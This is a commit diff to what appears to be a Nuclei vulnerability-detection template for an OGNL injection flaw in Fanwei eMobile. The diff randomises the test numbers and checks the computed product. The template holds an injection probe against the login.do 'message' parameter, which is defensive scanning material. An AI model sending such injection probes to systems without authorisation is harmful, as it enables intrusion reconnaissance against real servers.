updated variables and matcher

2023-04-13 23:34:03 +05:30 · 2023-04-13 23:34:03 +05:30 · cb03a9ea77
parent 6760735d6f
commit cb03a9ea77
1 changed files with 7 additions and 5 deletions
--- a/cnvd/2017/CNVD-2017-03561.yaml
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@ -4,7 +4,8 @@ info:
  name: Fanwei eMobile - OGNL Injection
  author: ritikchaddha
  severity: high
-  description: Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
+  description: |
+    Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
  reference:
    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
    - https://reconshell.com/vulnerability-research-list/
@ -14,10 +15,11 @@ info:
  tags: cnvd,cnvd2017,emobile,ognl,fanwei

 variables:
-  num1: "233333"
-  num2: "333332"
+  num1: "{{rand_int(800000, 999999)}}"
+  num2: "{{rand_int(800000, 999999)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"

-requests:
+http:
  - method: GET
    path:
      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
@ -29,7 +31,7 @@ requests:
      - type: word
        part: body
        words:
-          - '77777355556'
+          - "{{result}}"

      - type: status
        status: